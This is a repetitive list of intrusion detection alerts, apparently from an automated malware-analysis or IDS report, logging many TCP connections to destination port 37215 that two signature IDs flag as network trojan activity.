                  Timestamp:05/28/24-08:59:13.579617
                  SID:2829579
                  Source Port:59556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312486
                  SID:2835222
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922675
                  SID:2835222
                  Source Port:56288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316352
                  SID:2829579
                  Source Port:56062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661717
                  SID:2835222
                  Source Port:50876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793211
                  SID:2829579
                  Source Port:46928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315508
                  SID:2829579
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657734
                  SID:2835222
                  Source Port:51720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911689
                  SID:2829579
                  Source Port:33844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2835222
                  Source Port:59634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766208
                  SID:2835222
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787455
                  SID:2835222
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650815
                  SID:2835222
                  Source Port:41042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888403
                  SID:2835222
                  Source Port:56978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719876
                  SID:2835222
                  Source Port:52662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665384
                  SID:2829579
                  Source Port:40716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789786
                  SID:2829579
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821073
                  SID:2835222
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.645111
                  SID:2829579
                  Source Port:38346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585363
                  SID:2835222
                  Source Port:37026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546581
                  SID:2835222
                  Source Port:59996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651693
                  SID:2835222
                  Source Port:47966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696691
                  SID:2835222
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886174
                  SID:2829579
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790745
                  SID:2829579
                  Source Port:37458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874544
                  SID:2829579
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316606
                  SID:2829579
                  Source Port:57466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300200
                  SID:2835222
                  Source Port:44116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918153
                  SID:2835222
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606717
                  SID:2835222
                  Source Port:33122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876907
                  SID:2835222
                  Source Port:39028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549185
                  SID:2829579
                  Source Port:37596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660464
                  SID:2829579
                  Source Port:37432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292524
                  SID:2829579
                  Source Port:49834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703084
                  SID:2835222
                  Source Port:51658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296614
                  SID:2835222
                  Source Port:59652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790270
                  SID:2835222
                  Source Port:36678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769379
                  SID:2835222
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584337
                  SID:2829579
                  Source Port:46314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531484
                  SID:2835222
                  Source Port:55786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655646
                  SID:2835222
                  Source Port:49356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720251
                  SID:2829579
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845975
                  SID:2829579
                  Source Port:40818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591416
                  SID:2829579
                  Source Port:48934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704281
                  SID:2835222
                  Source Port:46512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628405
                  SID:2835222
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908983
                  SID:2829579
                  Source Port:58178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678828
                  SID:2829579
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294606
                  SID:2829579
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785710
                  SID:2829579
                  Source Port:39150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702575
                  SID:2835222
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496040
                  SID:2829579
                  Source Port:57126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789440
                  SID:2835222
                  Source Port:47998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922770
                  SID:2829579
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886174
                  SID:2835222
                  Source Port:35572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316290
                  SID:2829579
                  Source Port:48644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769279
                  SID:2829579
                  Source Port:48190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587354
                  SID:2829579
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795806
                  SID:2835222
                  Source Port:35048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606826
                  SID:2835222
                  Source Port:33948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628512
                  SID:2829579
                  Source Port:58458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298155
                  SID:2835222
                  Source Port:42668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846827
                  SID:2829579
                  Source Port:53084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661298
                  SID:2835222
                  Source Port:60714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536009
                  SID:2829579
                  Source Port:49610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738066
                  SID:2829579
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749968
                  SID:2829579
                  Source Port:57796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780558
                  SID:2835222
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604607
                  SID:2829579
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845949
                  SID:2835222
                  Source Port:58782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908617
                  SID:2829579
                  Source Port:43898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316311
                  SID:2829579
                  Source Port:56352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767773
                  SID:2829579
                  Source Port:42692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908507
                  SID:2829579
                  Source Port:54198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719720
                  SID:2835222
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2835222
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791734
                  SID:2835222
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546490
                  SID:2835222
                  Source Port:59766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742781
                  SID:2835222
                  Source Port:51764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886243
                  SID:2835222
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795443
                  SID:2835222
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780909
                  SID:2835222
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719895
                  SID:2835222
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316001
                  SID:2835222
                  Source Port:57420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536568
                  SID:2835222
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537244
                  SID:2835222
                  Source Port:41950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886654
                  SID:2835222
                  Source Port:36862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912218
                  SID:2829579
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589981
                  SID:2829579
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794622
                  SID:2829579
                  Source Port:33108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887054
                  SID:2835222
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536569
                  SID:2829579
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483039
                  SID:2835222
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695245
                  SID:2835222
                  Source Port:40784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888346
                  SID:2829579
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664632
                  SID:2835222
                  Source Port:57550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279428
                  SID:2835222
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795316
                  SID:2829579
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537259
                  SID:2829579
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276851
                  SID:2829579
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927380
                  SID:2835222
                  Source Port:54894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604068
                  SID:2829579
                  Source Port:43074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818010
                  SID:2829579
                  Source Port:50792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920019
                  SID:2835222
                  Source Port:45682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900355
                  SID:2835222
                  Source Port:35748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293094
                  SID:2835222
                  Source Port:36430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695696
                  SID:2829579
                  Source Port:56374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886189
                  SID:2829579
                  Source Port:55658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489517
                  SID:2829579
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911135
                  SID:2835222
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845968
                  SID:2829579
                  Source Port:49696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664401
                  SID:2835222
                  Source Port:43188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845733
                  SID:2835222
                  Source Port:35530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771032
                  SID:2835222
                  Source Port:41188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888752
                  SID:2829579
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847201
                  SID:2835222
                  Source Port:37876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277322
                  SID:2835222
                  Source Port:35650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527407
                  SID:2829579
                  Source Port:40202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911531
                  SID:2829579
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911681
                  SID:2835222
                  Source Port:40430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651778
                  SID:2835222
                  Source Port:45854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788874
                  SID:2829579
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923110
                  SID:2829579
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491392
                  SID:2829579
                  Source Port:48806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.307616
                  SID:2829579
                  Source Port:44062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537269
                  SID:2829579
                  Source Port:54224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604022
                  SID:2829579
                  Source Port:59616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908048
                  SID:2829579
                  Source Port:33486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857555
                  SID:2829579
                  Source Port:40748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487865
                  SID:2829579
                  Source Port:48016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719498
                  SID:2829579
                  Source Port:34032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563526
                  SID:2835222
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887991
                  SID:2835222
                  Source Port:46886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583512
                  SID:2835222
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789365
                  SID:2835222
                  Source Port:33656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.804176
                  SID:2835222
                  Source Port:42714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767562
                  SID:2835222
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788856
                  SID:2829579
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749968
                  SID:2829579
                  Source Port:40674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491370
                  SID:2829579
                  Source Port:56464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537179
                  SID:2835222
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650774
                  SID:2835222
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551016
                  SID:2829579
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529769
                  SID:2829579
                  Source Port:49028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799412
                  SID:2835222
                  Source Port:51462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491198
                  SID:2835222
                  Source Port:56494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742831
                  SID:2835222
                  Source Port:59710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696291
                  SID:2835222
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790963
                  SID:2829579
                  Source Port:49242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742929
                  SID:2835222
                  Source Port:60510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844969
                  SID:2829579
                  Source Port:37154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579003
                  SID:2835222
                  Source Port:46062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931495
                  SID:2835222
                  Source Port:48114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909412
                  SID:2829579
                  Source Port:44354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587001
                  SID:2835222
                  Source Port:48322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881219
                  SID:2829579
                  Source Port:40290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661747
                  SID:2835222
                  Source Port:39948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874558
                  SID:2829579
                  Source Port:33266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279351
                  SID:2835222
                  Source Port:51064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579767
                  SID:2835222
                  Source Port:33688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702871
                  SID:2835222
                  Source Port:49122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277346
                  SID:2835222
                  Source Port:38008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845028
                  SID:2835222
                  Source Port:42122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530888
                  SID:2835222
                  Source Port:56652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588688
                  SID:2835222
                  Source Port:55266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488687
                  SID:2829579
                  Source Port:51198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530234
                  SID:2829579
                  Source Port:53842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550561
                  SID:2835222
                  Source Port:59358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915729
                  SID:2829579
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296749
                  SID:2829579
                  Source Port:57032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628366
                  SID:2835222
                  Source Port:36818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628425
                  SID:2835222
                  Source Port:60576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886287
                  SID:2835222
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295963
                  SID:2835222
                  Source Port:41374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729802
                  SID:2835222
                  Source Port:37276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371941
                  SID:2829579
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576141
                  SID:2835222
                  Source Port:40100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.873300
                  SID:2835222
                  Source Port:46034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918153
                  SID:2829579
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536733
                  SID:2835222
                  Source Port:50908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488087
                  SID:2835222
                  Source Port:48116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661170
                  SID:2829579
                  Source Port:60720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609822
                  SID:2829579
                  Source Port:41166
                  Destination Port:37215
                  Protocol:TCP
